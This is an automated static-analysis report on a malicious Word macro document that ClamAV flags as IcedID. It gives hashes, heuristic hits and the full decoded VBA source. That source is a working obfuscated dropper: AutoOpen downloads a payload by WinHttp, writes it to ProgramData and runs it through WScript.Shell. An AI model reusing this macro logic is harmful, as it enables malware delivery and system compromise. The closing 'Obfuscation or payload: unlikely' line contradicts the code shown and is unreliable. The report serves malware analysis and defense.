Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 d53f2b53ae15df89…

MALICIOUS

Office (OOXML)

Size: 141.7 KB
Created: 2020-10-19 09:53:00 UTC
Authoring application: Microsoft Office Word 16.0000
First seen: 2020-10-25
MD5: 3495cd6a1f489d336a8c68f5346e6a08
SHA-1: 26df312eb6adf303f28d47c2dbd3813b481f145a
SHA-256: d53f2b53ae15df89af5dd0da86ba78884dd857b6e659a190ce91a4f3182edb59
Risk Score: 290

Heuristics (7)

  • ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
  • VBA project inside OOXML medium (4 related findings) OOXML_VBA
    Document contains a VBA project — VBA macros present
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Set yxENl = CreateObject(VEGIY + "." + "shell")
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set HyWvF = VBA.CreateObject(ThYpy + "" + VJjjf)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

Extracted artifacts (2)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source from OOXML)
Size: 12479 bytes
SHA-256: 211b7cb11a2933fa1f8e9f0370d6ea740486d746b11f5384b7cf0815e0f5c961
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "VBVWC"
Sub njvfb(JTgIr, Optional ByVal frhmK As String = "c:\programdata\HYDHB.txt", Optional ByVal VJjjf As String = "systemobject")
' Prefabs suggest flatus
' Piper digestible dogfights
' Gelatinous yule sugars
' Slave puling gutsy
' Mannerist disorder inevitability spigot wetly
' Parentsinlaw anchoring overacted ensued
' Itinerary legality widens eraser devise syncopated
' Deferral carcinogen pallbearers
' Homicidal lopes reprocessed ell appetiser decimals
' Redemption pavilions zoology
' Sows quondam lacework sjambok arabians
' Isometrically
' Neoprene loutish inhibit taxpaying bathrooms shivered
' Skimmer
' Unstacking magnanimity scientist schematics
' Coining aldermen harpoon
' Inescapably directs poison lockers straightforwardly
' Impolite
' Patronised varied calorimetry clock zooplankton
Set HyWvF = VBA.CreateObject(ThYpy + "" + VJjjf)
' Unmasks proclaimers sensor
' Notwithstanding deputise
' Transponders reruns
' Incubation dumbfounds conspecific cliques speculatively
Set hAANf = HyWvF.CreateTextFile(frhmK)
' Proclaimers deacons eight heading
' Zest cheerfulness protractors
' Matchbox slanderers refrigerant
' Cruelties tampers adjusting
' Skiing throttled kiss
' Exchanges eldorado middleweight conjurers
hAANf.WriteLine JTgIr
' Receivers molds minder opening mentalities
' Bridleways inactivation
' Meet reconnect exmember
' Orientation citruses
' Regretfully discoursed math decrees sabres
' Puppeteer banqueting loser
hAANf.Close
' Betrayal nostalgia
' Icecold gnawed beekeepers
' Achiever throwaway grief
' Flawed schoolmasters mango consular breeze
' Tragedians airlifting
' Undergraduates spectrophotometry neaten
' Salmonella chess urine aria
' Plankton forgetfulness retentive stoic loftily
' Lubricants
' Revolvers sodium shanks institutionalising
' Occupier seaport nationalising disembarkation
' Subsections accusers heeds
' Recalls obfuscate
' Flaxen
' Adopt
' Resentful
' Requisitioned shiny manured bemuse
' Discusses hydrants brass
' Illiberal victoriously libeler
' Virile
' Singed
' Completable detail
' Facilitators ceilidh scores eagle reimposed
' Clotted
' Missionary property whole
' Fascism strive
' Writer girdles stymie
' Nuzzles etcher equivalently
' Exercise urbanised pontoons plan fallacy
' Fizzled authoring rerolled
' Corsage pampas
' Botched perannum
End Sub
' Undertakings modifications
' Squiggles
' Observations isolating
' Upper uncollimated churns wariness
Sub AutoOpen()
' Venturesome tannins
' Pontification dewy wadings
' Arrived upbraid
' Conics
' Weevil sober
' Shoulders supplement clip
' Favour inflexible
' Marigolds inflowing dignifying
' Grate bronco maldives
' Illusionist kaleidoscope garrison lifelines sheared boroughs
' Unwatched pelmet despotism
' Creativeness
' Dimpled indiscriminate celsius arthur
' Backtrack refining
' Ingrown stodgiest prostrating
' Storages stymie restaurateur cleaves spheric
' Sheathed france ranching
' Communicant pigs orang
' Postural debone relevantly
' Winces negativeness anon joins
' Clipping assessments establishes
' Tequila narcosis segregated cacti
' Shuttles benediction
' Fortuneteller classing glints entomologists
' Piper levitated
' Disturbing operated ringers tachyon vaseline deficits
' Reloads witheringly
Dim yBDCN As New XRtAu
' Spheroid interbreed derelict homing shearwater wrecked
' Unspoiled technologist inapplicable administrator
' Unfetchable closing
' Pretoria everlastingly reciting
' Retracing
' Ebbed
DwDFo = ""
 
' Overreaction outright
' Sleuths fresher
' Velvet offensives foolishness preview
' Thereunder appending patients
' Repose reworking tranches acreage voraciously
' Tendered
' Cortex jackdaws bungalows
' Blackmailer prefix recur
' Irrelevances antagonising delicacy infatuated
' Circumvent pertinent
' Correlated convector qualitatively holograms
JTgIr = yBDCN.xSRTf(VxHkW)
' Sporrans carelessly misconception
' Proliferative beavering
' Validating maladjustment snowballed
' Malformation deepseated
' Recombinant zealotry ecologists glaciologists psalms
' Paidup inescapably wriggles
' Brides
njvfb TFpnS(JTgIr)
' Slowdown gaining royals spittoons ember
' Desultory thuds dryly
' Worshipped denigrating cancelling costeffectiveness apparatus
' Heathery ribosomal
' Washes squirms proctors phosphorescence
' Succinctly policyholders lattices restructures
' Coarsens termini
' Resolved scooping
' Dirtily wafer forecourts greenhouse
KbYgR mJDgz(0) + "vr32 c:\programdata\HYDHB.txt", "wscript"
End Sub
Function Sxxoe(EBVEJ, nnwRV)
' Gel gyms
' Hurdles babe underbelly
' Tenuous nil telegraphic
' Unavenged etherised ngoing hake
' Hydroxides chamberpot pallmall
Sxxoe = Split(EBVEJ, nnwRV)
End Function

Attribute VB_Name = "uTrxY"
' Shanty payer prodigious pasteboard inspectorate
' Sedimentation
' Participative ignited launderette reunions twined
' Tinkering woodcuts meaningfully realisations
' Overmanning saintly
Function TFpnS(mVwGe)
' Settlers evader transferable
' Audacity microfilming polycrystalline soundings cultivators
' Angelic accidentally grizzled
' Aisles sleepiest inculcated inform cooks
' Told disestablishing rwanda
' Expend
TFpnS = StrConv(mVwGe, vbUnicode)
' Protesters expressionists apprehend
' Batters
' Replaces guesswork
' Torsion
' Pups certify greyness
' Unserviced villager
End Function
' Queen
' Levitates prostitute governors climbing
' Flying terminations haters burgeon thickest snorers
' Vocalists
Function hMqkq()
' Zambezi luxury
' Modulations assigner
' Dined misdirecting garments tablet estimable
' Risen braking
' Hump
' Terrors queues velum shogun
' Sawed wickedness almonds
' Shoplifter shipboard beltings offset
' Curious honourably disbursement splaying
' Avoid
' Stripes permutes agiler unkindest
With ActiveDocument.shapes(1)
hMqkq = .AlternativeText
End With
End Function
' Dealing manuals cyberpunk
' Wont
' Hapless treasures indolence flaws
' Decilitre relentlessly retirement
Function mJDgz(oykqm)
' Beware bluffer ulterior
' Capri sump economise
' Innumerable fabricate oafish
' Granules budapest steer mutants lopsided euphemisms undertakers
' Otherness media skunks merchantable undercroft prowl
' Consorting unhuman rawest
' Wordiest still unsigned
' Hosta handsome knot invalidity scintillate
' Summertime drystone
' Demagogue
' Depolarisations smelly unofficial
MJZJv = Sxxoe(hMqkq(), "~~~")
awiHw = MJZJv(oykqm)
mJDgz = awiHw
End Function

Attribute VB_Name = "XRtAu"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Function SbHmk(WNyph, mWYtb, ktozA)
' Pastime airing madrigals
' Whiteness smashing
' Spooning yuppie
' Projectors perusal brides
SbHmk = Mid(WNyph, mWYtb, ktozA)
End Function
Public Function QAZaV(UILCG, AdhFS)
' Start
' Coincide blushing
' Neuroscientists files interfere
' Gaining crosses engorge
' Lozenge
' Relent memo inescapable
' Tricking photosensitive
' Flavourings frontiers perfidiously
' Lyricists regent
' Discountability enzyme dictate heady relationally
' Recruit detox
' Wildebeest
' Seller cinch kissed probability
' Legalising
' Polynomials spellbinding microcomputer lisps
' Injured
' Invalided enjoying fusiliers friendlier
hMhxb = Trim(UILCG)
For UnYAW = AdhFS To Len(hMhxb)
MwzLQ = SbHmk(hMhxb, UnYAW, AdhFS) & MwzLQ
Next UnYAW
QAZaV = MwzLQ
End Function
' Rarer subsidies
' Little triplane
' Alias month scabbed
' Coquette butchering deride genuine ouch planters synonymously
Function xSRTf(cfHUq)
' Unremitting attachment secondbest
' Oboist squads
' Satisfiable greets coronet
' Shrouds dumber
' Fabled relegating wifeless
' Creamier windsor cusps combustion
' Accrue extractions quenching thirty inflection
Dim HzBSD As Object
' Mansized rime imperium habitual
' Pamphlets packets clogged dosage
' Beaux
' Compressional halo subject weaved
' Swarms pity floods
' Replaceable potentiometer ameliorated
' Sung art
' Papering grieves sewage vine flintlocks
' Racism
' Voiced defend
' Corpora beadwork decelerations gridded
Set HzBSD = CreateObject(QAZaV(cfHUq, 1) + "." + QAZaV(cfHUq, 1) + "Request.5.1")
' Projection impishness fingernail physically numerous thinner
' Attempting
' Teds apnea unemployable ducklings
' Greed complementarity
' Sumatra beatify
' Canopied allocatable
' Coin gifting aviator
' Simultaneously theoreticians scotsman
' Lustful unnecessarily crewmen
' Maturity commander
' Safer serviette
' Cinnamon drapers battling goads account inconspicuous tinderbox falsehoods
' Helpmate assassinating robins
' Repaired bedside
' Algorithms marionette prefers scathing
' Tincan reconnoitring palisades
' Idea septets dismissing chancery water
' Debacles ocelots repartitioned terminators wining
' Understand camp increment
' Immigrants proposition
' Mania wraparound disallowed
' Unpractical groggy
' Errs connecting
' Passageways mechanisable polity recover
EimGS = mJDgz(1)
' Majorettes distinctiveness despoil tit
' Examine legates fingers clams paddocks
' Prestidigitatorial disaffiliation scores guilelessness
' Administrative harped continuable rapacious
' Idolise crates redundancy
' Lower unjamming goriest across saturating
' Premises focused herbicide confusable old unbalanced loathsomeness
' Entrench pancakes refinancing intimacy domesticated unstopped
HzBSD.Open "GET", QAZaV(EimGS, 1), False
' Aridity idiocies blackcurrant velvets gipsies hastens
' Valid disparagingly pancaked
' Payroll indicts warners cholesterol asphyxia
' Vivid
HzBSD.Send
' Grasping shallower limitless impressiveness molarities astronomically
' Blinks heterodox hibernal
' Plenipotentiary shivering loped monologue
' Hobbit expansively
' Reportage obtrusiveness supertankers
xSRTf = HzBSD.responsebody
End Function

Attribute VB_Name = "ZuDhV"
Public Const VxHkW As String = "ptthniw"
Public Const ThYpy As String = "scripting.file"
Sub KbYgR(SlLYe, VEGIY)
' Thruster investigating developing flunked
' Concert sapping jetting chronic
' Plunderers concluded siphoning
' Beermat trenched
' Damned reinventions
' Diligently pounced redeveloped
' Unveil
Set yxENl = CreateObject(VEGIY + "." + "shell")
' Idler stuffer birthrights aural
' Planet manhandling ambushes titter onlybegotten
' Chilly implied detestably abeyance
' Unlimited herbicides solace
' Stirfried pangs
' Soak botany
' Wrangling digestible vitamins acquainted healthier
' Insistently weevils protectively novelists
' Salvages nobler
' Nonbelievers bribes averred
' Alighted neighbourhoods peacock
' Coefficient
' Eventing
' Breweries
' Sauerkraut ached
' Debauched hardened coleslaw uninjured
' Flipping while cousins
' Mistrustfully
' Sabotaging walk lenders
' Reprocessing impersonating manipulative flours
' Collude gravures hiccough reflexes
' Benighted samba anonymously
' Pontifical anticoagulants conceding naturally shortens
' Guttersnipes bagfuls baseline
' Untruths tapir adjudications violated checklist
' Fertilisation lugged gentler culturing firmament
' Cruxes homologue bloodsports postman judder
' Both exploitative immoveable
' Everywhere enviously creaked displace
' Horticulturist ovular corticosteroids kilted
' Concertgoers dramatist lurks cloaks groundnut
' Dorsally mortgagee
' Feelings
' Entombment sunbath
' Tapioca huge
' Increases
' Meticulously atlantis gamut massing
' Obstructions anaesthetics
' Mitre impious uninfected tumultuous vocabularies correspondences
' Lender concerted refluxed misfire
' Editing assimilated seeable nicety
' Balls infecting
' Regaining roar enforced festal purports
' Tersely ranger badger compressed nightclothes scrupulous
Call yxENl.exec(SlLYe)
' Earlobes evilly
' Eiderdown mindful
' Tetra excavator gestalt
' Rampaged excusable
' Hug sulkiness illusions letterboxes mermen shut
End Sub
Filename: vbaProject_00.bin
Kind: vba-project
Source: OOXML VBA project: word/vbaProject.bin
Size: 46592 bytes
SHA-256: 934f604e55104a7aacfcac781baad115ff805a8bc39258a9ae2806b991fab497
Detection
ClamAV: Doc.Macro.ICEID1020-9781212-0
Obfuscation or payload: unlikely